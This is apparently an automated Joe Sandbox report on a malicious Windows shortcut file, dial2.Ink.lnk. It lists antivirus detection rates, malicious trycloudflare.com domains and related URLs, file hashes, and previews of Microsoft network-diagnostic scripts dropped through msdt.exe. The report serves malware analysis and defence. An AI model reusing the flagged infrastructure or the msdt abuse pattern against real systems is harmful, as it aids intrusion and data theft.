dial2.Ink.lnk	8%	ReversingLabs
dial2.Ink.lnk	9%	Virustotal	Browse
dial2.Ink.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.dll	0%	ReversingLabs
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.dll	0%	Virustotal	Browse
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticSnapIn.dll	0%	ReversingLabs
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticSnapIn.dll	0%	Virustotal	Browse
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\DiagPackage.dll.mui	0%	ReversingLabs
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\DiagPackage.dll.mui	0%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
boy-such-icon-positive.trycloudflare.com	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.microsoft.	0%	URL Reputation	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
https://pizza-practices-representative-country.trycloudflare.com	0%	Avira URL Cloud	safe
https://pizza-practices-representative-country.trycloudflare.com.Z2	0%	Avira URL Cloud	safe
http://www.microsoft.co	1%	Virustotal		Browse
https://pizza-practices-representative-country.trycloudflare.com	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
boy-such-icon-positive.trycloudflare.com	unknown	unknown	true	5%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.microsoft.	msdt.exe, 0000000D.00000002.3680506745.00000198C6CBD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pizza-practices-representative-country.trycloudflare.com	dial2.Ink.lnk	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://pizza-practices-representative-country.trycloudflare.com.Z2	dial2.Ink.lnk	true	Avira URL Cloud: safe	unknown
http://www.microsoft.co	msdt.exe, 0000000D.00000003.1361418548.00000198C6CDB000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447085
Start date and time:	2024-05-24 11:02:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	dial2.Ink.lnk
Detection:	MAL
Classification:	mal88.rans.spyw.evad.winLNK@7/16@1/0
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:02:59	API Interceptor	1x Sleep call for process: cmd.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.dll	http://Cerberus-sharedoc.com	Get hash	malicious	Unknown	Browse
	HTTP://G3.RS:8080/	Get hash	malicious	Unknown	Browse
	http://tee4usa.com	Get hash	malicious	Unknown	Browse
	https://bit.ly/3Gls7Vb	Get hash	malicious	Unknown	Browse
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticSnapIn.dll	http://Cerberus-sharedoc.com	Get hash	malicious	Unknown	Browse
	HTTP://G3.RS:8080/	Get hash	malicious	Unknown	Browse
	http://tee4usa.com	Get hash	malicious	Unknown	Browse
	https://bit.ly/3Gls7Vb	Get hash	malicious	Unknown	Browse
C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\DiagPackage.dll.mui	http://Cerberus-sharedoc.com	Get hash	malicious	Unknown	Browse
	HTTP://G3.RS:8080/	Get hash	malicious	Unknown	Browse
	http://tee4usa.com	Get hash	malicious	Unknown	Browse
	https://bit.ly/3Gls7Vb	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\NDF1936.tmp

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	data
Category:	modified
Size (bytes):	2812
Entropy (8bit):	2.9032722066306347
Encrypted:	false
SSDEEP:	24:Fo32Q1YSu+1YSqxqi88888n73qHi88887PqHi8888x+qTqj1G:umMu+M88888t88887B8888D
MD5:	36DCB98CF0C2F3529B7E38DD57AAF3CC
SHA1:	8898FBF6CAEB89793E076D42A8C8BA2FCA4A0D6B
SHA-256:	0AD67BE16A7C0E8C7ED63ECD43EDA71F598B857F0B91318353C979B4F697134E
SHA-512:	0AE136EE934038776949B1CDA4C3D043B57AA9EAECCE641389CE4BD90AEF816EA0C923E11EDABDD381FB5B536D2272887AD89E6EDDAEB9A1D7C3621771CB7D74
Malicious:	false
Reputation:	low
Preview:	<.A.n.s.w.e.r.s. .V.e.r.s.i.o.n.=.".1...0.".>.....<.I.n.t.e.r.a.c.t.i.o.n. .I.D.=.".I.T._.E.n.t.r.y.P.o.i.n.t.".>.<.v.a.l.u.e.>.I.n.C.o.n.t.e.x.t.<./.v.a.l.u.e.>.<./.I.n.t.e.r.a.c.t.i.o.n.>.....<.I.n.t.e.r.a.c.t.i.o.n. .I.D.=.".I.T._.H.e.l.p.e.r.C.l.a.s.s.N.a.m.e.".>.<.v.a.l.u.e.>.S.M.B.H.e.l.p.e.r.C.l.a.s.s.<./.v.a.l.u.e.>.<./.I.n.t.e.r.a.c.t.i.o.n.>.....<.I.n.t.e.r.a.c.t.i.o.n. .I.D.=.".I.T._.H.e.l.p.e.r.A.t.t.r.i.b.u.t.e.s.".>.<.v.a.l.u.e.>.<.!.[.C.D.A.T.A.[.<.H.e.l.p.e.r.A.t.t.r.i.b.u.t.e.s.>.<.H.e.l.p.e.r.A.t.t.r.i.b.u.t.e.>.0.1.1.0.0.8.0.0.C.C.C.C.C.C.C.C.C.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.A.0.0.0.0.0.0.0.A.0.0.0.0.0.0.0.4.0.0.0.2.0.0.0.1.0.2.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.0.0.0.0.0.5.5.0.0.4.E.0.0.4.3.0.0.5.0.0.0.6.1.0.0.7.4.0.0.6.8.0.0.0.0.0.0.0.1.1.0.0.0.0.0.0.0.0.0.0.0.0.0.4.3.0.0.0.0.0.0.5.C.0.0.5.C.0.0.6.2.0.0.6.F.0.0.7.9.0.0.2.D.0.0.7.3.0.0.7.5.0.0.6.3.0.0.6.8.0.0.2.D.0.0.6.9.0.0.6.3.0.0.6.F.0.0.6.E.0.0.2.D.0.0.7.0.0.0.6.F.0.0.7.3.0.0.6.9.0.0.7.4.0.0.6.9.0.0.

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.diagpkg

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (317), with CRLF line terminators
Category:	dropped
Size (bytes):	167016
Entropy (8bit):	4.413051981071322
Encrypted:	false
SSDEEP:	384:X+BeLgtgFgQg7rgZgp3vFD2smEtttbkcL5Of8hj1fVh1f8hWqEfVhnq2fVhMfxhd:XLgtgFgQg7rgZgplP/s
MD5:	0606098A37089BDC9D644DEE1CC1CD78
SHA1:	CADAE9623A27BD22771BAB9D26B97226E8F2318B
SHA-256:	284A7A8525B1777BDBC194FA38D28CD9EE91C2CBC7856F5968E79667C6B62A9D
SHA-512:	0711E2FEF9FDE17B87F3F6AF1442BD46B4C86BB61C8519548B89C7A61DFCF734196DDF2D90E586D486A3B33F672A99379E8205C240BD4BCB23625FFB22936443
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?><dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007" xmlns:wdem="http://diagnostics.microsoft.com/2007/08/WindowsDiagnosticExtendedMetadata">.. <DiagnosticIdentification>.. <ID>NetworkDiagnostics</ID>.. <Version>4.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>http://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>1.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteracti

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.dll

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	489984
Entropy (8bit):	7.291387835559217
Encrypted:	false
SSDEEP:	6144:LZC0lEOC2Us6eEyAc0jbJYOjlCLHUZQsxjuaJ7oSEvcdfSc0jbJYOjlCLHUZQ:LZFLUe6vJ/wLIvavyfEvJ/wLI
MD5:	EF3F72E162CFA6C082007672655CAE8A
SHA1:	F6BE37340CDED395EF7C3DAB103DE4E061B05806
SHA-256:	5A04D9F78BEF844FEE2FEC65610E12DB59CEFAA63544F3045401597AAE753B3C
SHA-512:	B63D884525CC747D4DEB1335BF31A27248DD612BE9D8A1F6CA7C5F5A795964AC3B8868994CDE1EC5CD0F4C537E00EC56FB45D5250F3BEC1BFA13EE4AA1F9C52C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....F..........." .........x....................................................../.....`A......................................................... ...u..............................T............................................................................rdata..............................@..@.rsrc....u... ...v..................@..@.....F.........T...T...T........F.........$................F.............................T....rdata..T...\|....rdata$zzzdbg.... .......rsrc$01.....0...e...rsrc$02.... ....,.J..o...m.W{F..,.0H...m.S..F.............................................................................................................................................................................................................................................................................................

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\HTInteractiveRes.ps1

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	951
Entropy (8bit):	5.0857751193503695
Encrypted:	false
SSDEEP:	24:Qb3DQ7NOepjIAflbfjbgTRmW26S1pGCXGiVd/ZF2GRaesBFw:mDzepZtjBtRRbCUae2q
MD5:	C25ED2111C6EE9299E6D9BF51012F2F5
SHA1:	2DEFBB5A2758AF744E3DD8AF3A4AA153A28E4713
SHA-256:	8E326EE0475208D4C943D885035058FAD7146BBA02B66305F7C9F31F6A57E81B
SHA-512:	AAC97463868162FE042748A279C38F6FB569E971E0CC0339D1A8969A7F5633EF7377B6F7DCFAE94BDD2BF96BBFF454B607EE8D7573E1C3C9569269FE82671D9E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....PARAM($RepairName, $RepairText, $HelpTopicLink, $HelpTopicLinkText, $FailResolution)..#Non NDF Help Topic Resolution (defined non-manual so we don't need to prompt the user to see the repair)....#include utility functions... .\UtilityFunctions.ps1..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....#the strings come in as raw resource strings, load the actual strings..$repairNameStr = LoadResourceString $RepairName;..$repairTextStr = LoadResourceString $RepairText;..$helpTopicLinkTextStr = LoadResourceString $HelpTopicLinkText....#display the help topic interaction..Get-DiagInput -ID "IT_HelpTopicRepair" -Parameter @{"IT_P_Name"=$repairNameStr; "IT_P_Description"=$repairTextStr; "IT_P_HelpTopicText" = $helpTopicLinkTextStr; "IT_P_HelpTopicLink" = $HelpTopicLink;}....if($FailResolution -eq "TRUE")..{.. throw "Issue not resolved."..}..

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\InteractiveRes.ps1

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	770
Entropy (8bit):	5.043368661106705
Encrypted:	false
SSDEEP:	24:Qb3DQ7NcIKGlbfjbgTRmW26S1pGK/KrGFxw:mDl4jBtPKH
MD5:	25B8543DBF571F040118423BC3C7A75E
SHA1:	49044724698E6964DC93ACF5BEE2A77B8EAD4133
SHA-256:	D78E6291D6F27AC6FEBDCF0A4D5A34521E7F033AF8875E026DF21BA7513AB64A
SHA-512:	EC991FF552C1012209940CDCB081D64876B7989C56F07739B392DAAE9BCABA883B45AA90D50BEF31F276A9CD8492EE2B9DB700CD5E20E7B17BA43D98EC394DF5
Malicious:	false
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....PARAM($RepairName, $RepairText, $FailResolution)..#Non NDF Informational Resolution (defined non-manual so we don't need to prompt the user to see the repair)....#include utility functions... .\UtilityFunctions.ps1..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....#the strings come in as raw resource strings, load the actual strings..$repairNameStr = LoadResourceString $RepairName;..$repairTextStr = LoadResourceString $RepairText;....#display the help topic interaction..Get-DiagInput -ID "IT_InfoOnlyRepair" -Parameter @{"IT_P_Name"=$repairNameStr; "IT_P_Description"=$repairTextStr; }....if($FailResolution -eq "TRUE")..{.. throw "Issue not resolved."..}..

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticSnapIn.dll

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0031830583187595
Encrypted:	false
SSDEEP:	192:dXcso4xinzRCxtd3wz5AstHq9Y2f0mWjeLNW:dXckCMPGz9ZYWC5W
MD5:	502A165A5058F93FA7F84A9FB52887CD
SHA1:	43C723564649244A9FB28EDFEC83F0330420CEB1
SHA-256:	818DD25A449FEB9D30A108550940D3729FF1C83A8957049AA5E5EE56C89573DB
SHA-512:	A3B2B5A5D75DBBA17348FBECE170FB94E1406789724CC35FBDE36CAC55C58310F08E580E3FE5E9D7F306DE4FD579B69704CBD5B43D048CDA0B24CEED37770163
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>!............" ..0..............:... ...@....... ..............................D.....`..................................:..O....@..@....................`.......9..8............................................ ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`.......$..............@..B.................:......H........"..\|...................P9.......................................r...p.r3..p.rG..p..(......(........0..,..........@......(....&.s......@......(....&.o......(....V.(......(......(......{-..."..}-.....{...."..}.....0..........~.......~.....~.....s...... ..........(........,...s....z.....(........,...s....z..6M.....+;......(....(...............o........(....(....jX(.......X.....7..(.....(....&..*.0..F........o.....+ ..(......o.....{.....(....-.......(....-...

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsResolve.ps1

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	12213
Entropy (8bit):	4.649249749706581
Encrypted:	false
SSDEEP:	192:eLXYPXsa+OjfI9HIufxAey+3OG78/ce+eT5WjifrM+BK:VPXaifqdfxAey+ecmAu7k
MD5:	D213491A2D74B38A9535D616B9161217
SHA1:	BDE94742D1E769638E2DE84DFB099F797ADCC217
SHA-256:	4662C3C94E0340A243C2A39CA8A88FD9F65C74FB197644A11D4FFCAE6B191211
SHA-512:	5FD8B91B27935711495934E5D7CA14F9DD72BC40A38072595879EF334A47F99E0608087DDC62668C6F783938D9F22A3688C5CDEF3A9AD6C3575F3CFA5A3B0104
Malicious:	false
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....PARAM($InstanceID, $RepairID, $RepairID1)....#include utility functions... .\UtilityFunctions.ps1..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....<# function Pop-Msg {... param([string]$msg ="message",... [string]$ttl = "Title",... [int]$type = 64) ... $popwin = new-object -comobject wscript.shell... $null = $popwin.popup($msg,0,$ttl,$type)... remove-variable popwin..} #>......$script:ExpectingException = $false..$selectedRepair = $null..#pop-msg $InstanceID..#list of repairs to execute..if($InstanceID -eq $null)..{.. throw "No InstanceID specified"..}..else..{.. # if we re-ran diagnostics after validation failure and found the same issues we'll get the repair call to the original session.. # in these cases, we should use the new session instead to avoid unexpected behavior.. if($Global:ndfRerun -ne $null).. {.. "Replacing original incident " + $Global:ndf.I

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsTroubleshoot.ps1

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25783
Entropy (8bit):	4.500605198321576
Encrypted:	false
SSDEEP:	384:blSoNnCiXTShob5bdVTz6rZTvxlBNexTKmh+xdxBUNQGJ:xSoTh8Jq
MD5:	2857343E8845EADB9B60CA0727CBDCB7
SHA1:	82A5533B3739504C72F9DCE7D353845B35037DEE
SHA-256:	06D927AE1DB217378EA77146FDCCA66D1F1F6D90780B734B8748D1052FBD8B86
SHA-512:	56B09BFBFF32B43DDD8E4636A485AF111B6DBFA2B7181299A22A3D007CF87DF0B09433100DC693C81C4F746A40F42FC51C75436511BE26270B8D84F7AC8EAD7D
Malicious:	false
Preview:	# Copyright (C) Microsoft Corporation. All rights reserved.....#include utility functions and localization data... .\UtilityFunctions.ps1..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....#set the environment constants...\UtilitySetConstants....Write-DiagProgress -activity $localizationString.progress_Diagnosing_Initializing......#reset the global NDF object..$Global:ndf = $null..$Global:previousNdf = $null....#initialize script level variables (script scope used to avoid odd powershell scope handling)..$script:ExpectingException = $false..$script:incidentID = $null..$Global:incidentData = $null #need to access this during verification as well..$script:skipRerun = $false..$script:attachTraceFile = $false..$script:isRerun = $false....#first check whether we're either elevated or a re-run scenario..&{.. $prevIncidentID = 0.. $prevFlags = 0.... $script:ExpectingException = $true.. #marked as no-ui. throws exception if not available.. $S

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsVerify.ps1

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ISO-8859 text, with very long lines (307), with CRLF line terminators
Category:	dropped
Size (bytes):	11079
Entropy (8bit):	4.751587059666952
Encrypted:	false
SSDEEP:	192:YORm9mJWriv3iriv3oyriv3vgriv3qB3b8FnHayrBJckzrSartt0qF+rSG/rSurT:YORm9mJDv33v3oHv3lv3qB3b8FnHrrBA
MD5:	9B222D8EC4B20860F10EBF303035B984
SHA1:	B30EEA35C2516AFCAB2C49EF6531AF94EFAF7E1A
SHA-256:	A32E13DA40AC4B9E1DAC7DD28BC1D25E2F2136B61FF93BE943018B20796F15BC
SHA-512:	8331337CCB6E3137B01AEEC03E6921FD3B9E56C44FA1B17545AE5C7BFCDD39FCD8A90192884B3A82F56659009E24B63CE7F500E8766FD01E8D4E60A52DE0FE67
Malicious:	false
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....PARAM($RootCauseID, $instanceID)....#include utility functions... .\UtilityFunctions.ps1..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....#execute validation only once, and don't execute if repair skipped..$validationCalled = $false..if($Global:ValidateResult -eq $null -and ($Global:RepairSkipped -eq $false))..{.. $waitHandle = $Global:ndf.Validate($ValidateWaitTime);.. if($waitHandle -eq $null).. {.. throw "Validate call failed".. }.... WaitWithProgress $localizationString.progress_Vaildating_NoDetails $waitHandle $Global:ndf.. $Global:ValidateResult = $Global:ndf.ValidateResult.... #add the trace log to the session.. AddTraceFileToSession $Global:ndf $localizationString.TraceFileReportName "Verify".... $validationCalled = $true..}..else..{.. if(!$Global:ValidateResult -eq $null).. {.. "ID:" + $RootCauseID + " InstanceId:" + $instanc

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\StartDPSService.ps1

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	567
Entropy (8bit):	4.837302167759307
Encrypted:	false
SSDEEP:	12:QcM3BFN+7bxAPe/LACrfgjvj5s8x8i9OoXdEgnc8x8i9OoXdQIx:Qb3DQ7FMejjbgTNhii9dXDxii9dXOe
MD5:	A660422059D953C6D681B53A6977100E
SHA1:	0C95DD05514D062354C0EECC9AE8D437123305BB
SHA-256:	D19677234127C38A52AEC23686775A8EB3F4E3A406F4A11804D97602D6C31813
SHA-512:	26F8CF9AC95FF649ECC2ED349BC6C7C3A04B188594D5C3289AF8F2768AB59672BC95FFEFCC83ED3FFA44EDD0AFEB16A4C2490E633A89FCE7965843674D94B523
Malicious:	false
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....PARAM($SetAuto)....#include localization data..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....if($SetAuto)..{.. #make DPS automatic.. Write-DiagProgress -activity $localizationString.progress_Repairing -status $localizationString.repair_SetAutoDPS.. set-service dps -StartupType Automatic..}....#start the DPS service..Write-DiagProgress -activity $localizationString.progress_Repairing -status $localizationString.repair_StartDPS..start-service dps..

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\UtilityFunctions.ps1

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	54687
Entropy (8bit):	4.91902609892868
Encrypted:	false
SSDEEP:	768:AaDgc60FE2UMeV6HQEqEVBWMBaRNdKdNh5BIW6Mk7svkxtFJuAQQW:j0a4bKcW6MkcSuj
MD5:	C912FAA190464CE7DEC867464C35A8DC
SHA1:	D1C6482DAD37720DB6BDC594C4757914D1B1DD70
SHA-256:	3891846307AA9E83BCA66B13198455AF72AF45BF721A2FBD41840D47E2A91201
SHA-512:	5C34352D36459FD8FCDA5B459A2E48601A033AF31D802A90ED82C443A5A346B9480880D30C64DB7AD0E4A8C35B98C98F69ECEEDAD72F2A70D9C6CCA74DCE826A
Malicious:	false
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....function GetRuntimePath([string]$fileName = $(throw "No file name is specified"))..{.. if([string]::IsNullorEmpty($fileName)).. {.. throw "Invalid file name".. }.... [string]$runtimePath = [System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory().. return Join-Path $runtimePath $fileName..}....function RegSnapin([string]$dllName = $(throw "No dll is specified"))..{.. $dllPath = ".\" + $dllName.. Import-Module $dllPath..}....function UnregSnapin([string]$dllName = $(throw "No dll is specified"))..{ .. $moduleName = $dllName.TrimEnd(".dll").. Remove-Module $moduleName..}....function GetExistingNDFInstance($IncidentID)..{.. &{.. #if fails we start a new session.. $script:ExpectingException = $true.. $ndf = new-object -comObject ndfapi.NetworkDiagnostics.1 -strict.. $ndf.OpenExistingIncident($IncidentID); #throws exception if fails..

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\UtilitySetConstants.ps1

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3011
Entropy (8bit):	5.393839415081681
Encrypted:	false
SSDEEP:	48:mDqbURueqlXC2ay3g+rAgeNTFNe5L9tkYnNn2E8/UBUyuzoth1GlB:mD+UR6XC2az4MjY5L9VnNnIUBUyuzoti
MD5:	0C75AE5E75C3E181D13768909C8240BA
SHA1:	288403FC4BEDAACEBCCF4F74D3073F082EF70EB9
SHA-256:	DE5C231C645D3AE1E13694284997721509F5DE64EE5C96C966CDFDA9E294DB3F
SHA-512:	8FC944515F41A837C61A6C4E5181CA273607A89E48FBF86CF8EB8DB837AED095AA04FC3043029C3B5CB3710D59ABFD86F086AC198200F634BFB1A5DD0823406B
Malicious:	false
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....function DefineConstant($curVal, $name, $value)..{.. if($curVal -eq $null).. {.. set-variable -name $name -value $value -option constant -scope Global.. }..}....DefineConstant $DiagnoseWaitTime "DiagnoseWaitTime" 90000..DefineConstant $RepairWaitTime "RepairWaitTime" 90000..DefineConstant $ValidateWaitTime "ValidateWaitTime" 90000..DefineConstant $ProgressUpdateDelay "ProgressUpdateDelay" 1000..DefineConstant $WinBuiltinAdministratorsSid "WinBuiltinAdministratorsSid" 26..DefineConstant $WinBuiltinNetworkConfigurationOperatorsSid "WinBuiltinNetworkConfigurationOperatorsSid" 37..DefineConstant $WinLocalLogonSid "WinLocalLogonSid" 80..DefineConstant $GuidLength "GuidLength" 38..DefineConstant $DefaultDiagURL "DefaultDiagURL" ""..DefineConstant $S_OK "S_OK" 0..DefineConstant $S_FALSE "S_FALSE" 1..DefineConstant $RF_USER_ACTION "RF_USER_ACTION" 0x10000000..DefineConstant $RF_INFORMATION_ONLY "RF_INFORMATION_O

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\DiagPackage.dll.mui

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17408
Entropy (8bit):	3.463167967348922
Encrypted:	false
SSDEEP:	96:40OJmd+VoozojEIjPe/dQTVOd5hvhHyHMVqz+4MEvTLGlyQzwv7KCbVeog3+yt41:40njnexdUMR4wgK+gWlTWy
MD5:	42924954580FC0B97147D18CBD9064A2
SHA1:	E02B93D36214FB4A98AA9B4711920541C78D5B26
SHA-256:	B03FC44FCB28F039F94AC63B44617E04071D1DC5A5CD15E187AA806A085EF31A
SHA-512:	0B2737EE5C21538B120FD975850E7899F7F1B8B7FEC49B5E9F807EBFAE62DA3EB333CDBDB65912BACA43B39D63AFBE1258C8C54CC7E8A313D108339778585B73
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L..................!.........B...............................................`......W.....@.......................................... ...?..............................8............................................................................rdata..............................@..@.rsrc....@... ...@..................@..@.....\0.........T...8...8........\0.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%...:...rsrc$02.... ....8D].m........2.2....j@e..\0.........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\LocalizationData.psd1

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	5378
Entropy (8bit):	3.527173963273437
Encrypted:	false
SSDEEP:	96:i30smw/9nwbgDwlwn0iYveuQzRYkwj0pD+EijvxFvXG5B9c1rO4L:i30sZYlGe3vGfw
MD5:	B2780BE67C909635DAEC96B9C909EC54
SHA1:	F4A8562D46548CBF091EB5230D2A6A3C5859BA3E
SHA-256:	0E7173882297619CE2097133B9D5C69D69B29997C39A5CBC4A88247C580642C5
SHA-512:	8576D3313963A814870995FDE92F739A786ED7F93578F190DE07308E1DD66A8F511D4E06733298A250AAF48B64404DE4F99B03079B97FC33CDC3C798EAD0AFD0
Malicious:	false
